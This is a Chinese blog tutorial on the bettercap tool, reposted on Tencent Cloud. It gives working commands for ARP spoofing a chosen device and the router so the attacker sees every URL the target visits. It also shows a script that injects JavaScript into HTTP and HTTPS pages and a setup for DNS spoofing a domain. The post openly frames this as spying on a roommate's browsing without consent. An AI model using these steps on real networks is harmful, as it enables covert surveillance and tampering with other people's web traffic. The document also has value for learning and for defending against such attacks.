首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >室友半夜居然再看这些网站

室友半夜居然再看这些网站

作者头像
逍遥子大表哥
发布2025-07-28 16:54:16
发布2025-07-28 16:54:16
3180
举报
文章被收录于专栏:kali blogkali blog

bettercap 是一个用 Go 编写的强大、易于扩展和可移植的框架,旨在为安全研究人员、红队成员和逆向工程师提供易于使用的多合一解决方案,其中包含他们可能需要执行侦察和攻击WiFi网络、低功耗蓝牙设备、IPv4/IPv6网络。

bettercap

安装

在kali中安装,很简单我们只需要执行下面命令即可。

代码语言:javascript
复制
apt-get install bettercap

运行

在kali中我们直接以root身份运行命令:

代码语言:javascript
复制
bettercap

查看帮助

代码语言:javascript
复制
help

常用的命令

代码语言:javascript
复制
help MODULE #查看指定模块的帮助命令
set NAME VALUE #设置模块
MODULE on/off#激活/关闭模块

牛刀小试

01获取目标访问URL

利用这款工具,我们可以查看局域网内指定设备或者所有设备访问的URL。

代码语言:javascript
复制
set arp.spoof.targets 192.168.50.80,192.168.50.1
arp.spoof on #激活插件

如下,当设备访问站点时,会显示目标访问的URL

参数说明:192.168.50.80,192.168.50.1分别为目标IP和路由IP。不填写默认局域网全部设备。从此舍友访问的小站点,再也逃不出你的法眼。

02 js弹窗

因为现在很多站点都是Https。我们直接在https站点中弹窗,首先写一段js脚本,保存到kali中。示例如下:

代码语言:javascript
复制
function onResponse(req,res){
    if(res.ContentType.indexOf('text/html')==0){
        var body=res.ReadBody();
        if(body.indexOf('</head>')!=-1){
            res.Body=body.replace(
                '</head>',
               '<script type="text/javascript">alert("@逍遥子大表哥,欢迎关注微信公众号 kali笔记")</script></head>'
            );
            }
        }
}

接下来,配置命令

代码语言:javascript
复制
set arp.spoof.targets 192.168.50.80,192.168.50.1
set https.proxy.script /root/22.js #http站点将https变成http就行了
arp.spoof on #激活插件
https.proxy on

接下来,我们访问CSDN

HTTPS会弹窗提示,http直接过掉

在源码中,我们可以看到已经注入到了页面中。

03 DNS劫持

目前仅在http站点测试成功,理论https也是可以的,估计是我姿势不对。配置参数如下 首先在kali的/var/www/html目录新建一个index.html文件。内容随意。配置完成后,启动kali自带的apache服务

代码语言:javascript
复制
service apache2 start

接下来,在arp的基础上配置dns劫持

代码语言:javascript
复制
set dns.spoof.domains aliyundatav.cn
dns.spoof #激活插件

效果如下:

本地UI

如果你觉得命令行太难,没关系在最新的版本中为你提供了web-ui界面。另提终端输入命令

代码语言:javascript
复制
sudo bettercap -caplet http-ui

然后在浏览器中访问http://127.0.0.1:80

输入用户名 user pass登录,效果如下

总结

bettercap是继中间人攻击工具etrcap工具后,又一款比较好玩的工具,尤其是对https站点的适配较高。在后面的文章中我们还会更新相关文章,尽情期待!

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-01-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 kali笔记 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 安装
  • 牛刀小试
  • 本地UI
  • 总结
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档